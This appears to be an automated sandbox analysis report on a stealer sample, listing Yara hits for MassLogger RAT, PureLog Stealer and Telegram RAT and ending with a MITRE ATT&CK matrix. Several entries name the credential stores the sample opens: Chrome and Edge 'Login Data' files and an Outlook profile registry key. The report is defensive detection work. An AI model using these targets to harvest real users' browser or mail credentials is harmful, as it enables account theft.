Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 21.2.rpkhzpuO.pif.36680000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2d0c3f56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.34ad3d90.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.36680000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.rpkhzpuO.pif.2b351240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2f7c0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2fd95570.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.rpkhzpuO.pif.31ae57d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2d0c4e5e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.264e5570.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2ff20000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.27a90f08.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.25173f56.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2f7c0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.35f30f08.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.35f30f08.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2fdd3d90.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2e323d90.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2e2e6478.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.25174e5e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2ecd0f08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rpkhzpuO.pif.2350ac48.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2e323d90.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.34ad3d90.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.35f30000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.280c0000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.rpkhzpuO.pif.2d0ead88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.34a95570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2eaa3f56.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.25174e5e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.312b0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.26523d90.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2ecd0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2d0c3f56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2e2e5570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.rpkhzpuO.pif.31ae57d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.33783f56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.33784e5e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2ecd0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.280c0000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.27a90f08.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2f7c0f08.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.33783f56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.312b0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2fdd3d90.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2eaa3f56.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.33784e5e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2f7c0f08.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2e2e5570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2e2e6478.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.34a96478.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.35f30000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.27a90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.rpkhzpuO.pif.2d0ead88.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.34a95570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2ff20000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.27a90000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2fd95570.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2eaa4e5e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.rpkhzpuO.pif.2b351240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2d0c4e5e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.264e6478.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2fd96478.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2eaa4e5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2ecd0f08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.25173f56.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.34a96478.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.264e5570.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2fd96478.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.2695514518.000000002EA63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2698667477.000000002ECD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2653675351.000000002FF20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2176410380.000000002350A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2565470254.0000000033743000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2505077127.000000002D0EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2644300802.000000002E2E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2704916181.00000000312B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2646464054.000000002F7C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2626188397.0000000034A95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2639575698.000000002D083000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2276789747.0000000027A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2627942016.0000000035F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2277062923.00000000280C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2629075725.0000000036680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2262951312.0000000025133000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2700260465.000000002FD95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2272905069.00000000264E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2314988058.0000000031AE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2417739511.000000002B351000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3379727606.0000000002A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3379727606.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 21.2.rpkhzpuO.pif.36680000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2d0c3f56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.34ad3d90.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.36680000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.rpkhzpuO.pif.2b351240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2f7c0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2fd95570.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.rpkhzpuO.pif.31ae57d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2d0c4e5e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.264e5570.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2ff20000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.27a90f08.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.25173f56.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2f7c0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.35f30f08.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.35f30f08.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2fdd3d90.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2e323d90.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2e2e6478.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.25174e5e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2ecd0f08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rpkhzpuO.pif.2350ac48.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2e323d90.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.34ad3d90.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.35f30000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.280c0000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.rpkhzpuO.pif.2d0ead88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.34a95570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2eaa3f56.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.25174e5e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.312b0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.26523d90.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2ecd0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2d0c3f56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2e2e5570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.rpkhzpuO.pif.31ae57d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.33783f56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.33784e5e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2ecd0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.280c0000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.27a90f08.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2f7c0f08.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.33783f56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.312b0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2fdd3d90.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2eaa3f56.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.33784e5e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2f7c0f08.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2e2e5570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2e2e6478.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.34a96478.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.35f30000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.27a90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.rpkhzpuO.pif.2d0ead88.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.34a95570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2ff20000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.27a90000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2fd95570.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2eaa4e5e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.rpkhzpuO.pif.2b351240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rpkhzpuO.pif.2d0c4e5e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.264e6478.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2fd96478.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2eaa4e5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2ecd0f08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.25173f56.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rpkhzpuO.pif.34a96478.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.264e5570.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rpkhzpuO.pif.2fd96478.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.2695514518.000000002EA63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2698667477.000000002ECD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2653675351.000000002FF20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2176410380.000000002350A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2565470254.0000000033743000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2505077127.000000002D0EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2644300802.000000002E2E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2704916181.00000000312B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2646464054.000000002F7C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2626188397.0000000034A95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2639575698.000000002D083000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2276789747.0000000027A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2627942016.0000000035F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2277062923.00000000280C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2629075725.0000000036680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2262951312.0000000025133000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2700260465.000000002FD95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2272905069.00000000264E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2314988058.0000000031AE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2417739511.000000002B351000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	12 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 Valid Accounts	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	1 Input Capture	1 System Network Connections Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	311 Process Injection	3 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	1 Email Collection	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	241 Security Software Discovery	SSH	1 Input Capture	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
